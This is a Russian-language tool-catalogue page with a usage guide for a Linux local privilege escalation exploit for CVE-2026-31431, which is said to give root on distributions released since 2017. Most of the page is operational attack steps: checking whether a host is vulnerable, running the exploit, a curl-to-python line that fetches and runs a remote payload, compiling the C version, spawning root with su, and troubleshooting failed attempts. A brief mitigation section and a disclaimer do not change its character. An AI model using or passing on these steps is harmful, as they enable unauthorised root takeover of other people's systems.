Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Copy-Fail-Exploit-CVE-2026-31431 — Большинство LPE-уязвимостей в Linux требуют гоночного окна или специфичного для ядра смещения. Copy Fail — это прямолинейный логический изъян, ему не нужно ни то, ни другое. Один и тот же Python-скрипт размером 732 байта (или .c elf) даёт root-права на каждом дистрибутиве Linux, выпущенном с 2017 года. | Kitploit
Инструменты/GitHubGitHub/painoob/copy-fail-exploit-cve-2026-31431
Повышение привилегийФреймворки для эксплойтовАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеЭксплуатация Бинарных Файлов
GitHubpainoob/copy-fail-exploit-cve-2026-31431

Copy-Fail-Exploit-CVE-2026-31431

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

Большинство LPE-уязвимостей в Linux требуют гоночного окна или специфичного для ядра смещения. Copy Fail — это прямолинейный логический изъян, ему не нужно ни то, ни другое. Один и тот же Python-скрипт размером 732 байта (или .c elf) даёт root-права на каждом дистрибутиве Linux, выпущенном с 2017 года.

Репозиторий
104223 месяцев назадПроверено Kitploit
Поделиться

Copy Fail (CVE-2026-31431) – Руководство по использованию эксплойта

⚠️ Дисклеймер

Данный материал предназначен только для образовательных целей и авторизованного тестирования безопасности. НЕ запускайте это на системах без явного разрешения.


📌 Обзор

Copy Fail (CVE-2026-31431) — это уязвимость локального повышения привилегий (LPE) в Linux, затрагивающая криптографический API ядра через AF_ALG.

Она позволяет непривилегированному пользователю перезаписать данные page cache SUID-бинарника (например, /usr/bin/su) и получить root-доступ.


🧠 Требования

Системные требования

  • Ядро Linux (уязвимое — зависит от статуса патча)
  • Включённый AF_ALG
  • Загруженный модуль algif_aead

Требования к Python-эксплойту

  • Python 3.10+
  • Поддержка:
    • os.splice
    • socket(AF_ALG)

🔍 Проверка уязвимости

root@kitploit:~
uname -a
grep -i authencesn /proc/crypto
lsmod | grep alg

Ожидаемые индикаторы:

  • authencesn(hmac(sha256),cbc(aes))
  • Загруженный algif_aead

🐍 Запуск Python-эксплойта

1. Запуск напрямую

root@kitploit:~
python3 copy_fail_exp.py

2. Или через curl (если размещён удалённо)

root@kitploit:~
curl https://copy.fail/exp | python3

3. Запуск root-оболочки

root@kitploit:~
su
id

Ожидаемый результат:

root@kitploit:~
uid=0(root)

⚠️ Частые проблемы (Python)

❌ Ошибка: os.splice not found

Причина:

  • Версия Python < 3.10
  • Ограниченная сборка

Решение:

  • Используйте более новую версию Python
  • Загрузите статический интерпретатор Python

⚙️ Компиляция C-версии

1. Компиляция

root@kitploit:~
gcc copy_fail_exp.c -o copy_fail

2. Сделать исполняемым

root@kitploit:~
chmod +x copy_fail

3. Запуск эксплойта

root@kitploit:~
./copy_fail
su

⚠️ Частые проблемы (C)

❌ Эксплойт запускается, но root не получен

Возможные причины:

  • Ядро пропатчено
  • Неверные смещения
  • Несоответствие окружения

❌ Ошибки компиляции

Установите необходимые инструменты:

root@kitploit:~
apt update && apt install build-essential

🧪 Устранение неполадок

Проверка, пропатчена ли система

root@kitploit:~
dmesg | grep -i alg

Проверка модуля

root@kitploit:~
lsmod | grep algif_aead

🛡️ Меры защиты

Отключение уязвимого модуля

root@kitploit:~
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead

Применение патча ядра

Обновите систему:

root@kitploit:~
apt update && apt upgrade

📌 Примечания

  • Эксплойт изменяет только page cache (непостоянно)
  • Требуется локальный доступ
  • По умолчанию не эксплуатируется удалённо

🧠 Финальное замечание

Если эксплойт не сработал, рассмотрите:

  • Ядро уже пропатчено
  • Ограничения окружения
  • Альтернативные векторы повышения привилегий (SUID, capabilities, ошибки конфигурации sudo)

📚 Ссылки

  • https://copy.fail/
  • CVE-2026-31431

👨‍💻 Примечания автора

Используйте этот эксплойт ответственно — только в лабораториях, на CTF-соревнованиях и в авторизованных пентестах.

Скачать инструмент